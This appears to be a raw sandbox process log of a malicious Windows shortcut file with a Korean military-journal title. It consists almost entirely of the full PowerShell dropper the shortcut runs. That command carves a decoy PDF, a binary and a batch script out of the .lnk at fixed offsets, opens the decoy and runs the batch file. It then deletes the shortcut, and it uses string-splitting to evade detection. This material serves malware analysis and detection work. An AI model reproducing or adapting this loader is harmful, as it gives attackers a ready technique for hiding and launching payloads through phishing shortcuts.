cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iYxNOhPj" C:\Users\test22\AppData\Local\Temp\한국군사학논총.lnk
2544cmd.exe "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in $exs} | where-object {$_.length -eq 0x031732EF} | Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010E4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x002A8A49,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\toy01.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $env:temp+'\'+'toy02.dat';$string = [Text.Encoding]::GetEncoding('utf-8').GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0038220D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x0000014C;$lnkFile.Read($batByte, 0, 0x0000014C);$executePath = $env:temp+'\'+'toy0'+'3.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[System.IO.File]::Delete($lnkPath);"&& exit
2656cmd.exe C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
2760powershell.exe C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in $exs} | where-object {$_.length -eq 0x031732EF} | Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010E4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x002A8A49,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\toy01.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $env:temp+'\'+'toy02.dat';$string = [Text.Encoding]::GetEncoding('utf-8').GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0038220D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x0000014C;$lnkFile.Read($batByte, 0, 0x0000014C);$executePath = $env:temp+'\'+'toy0'+'3.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[System.IO.File]::Delete($lnkPath);"
2812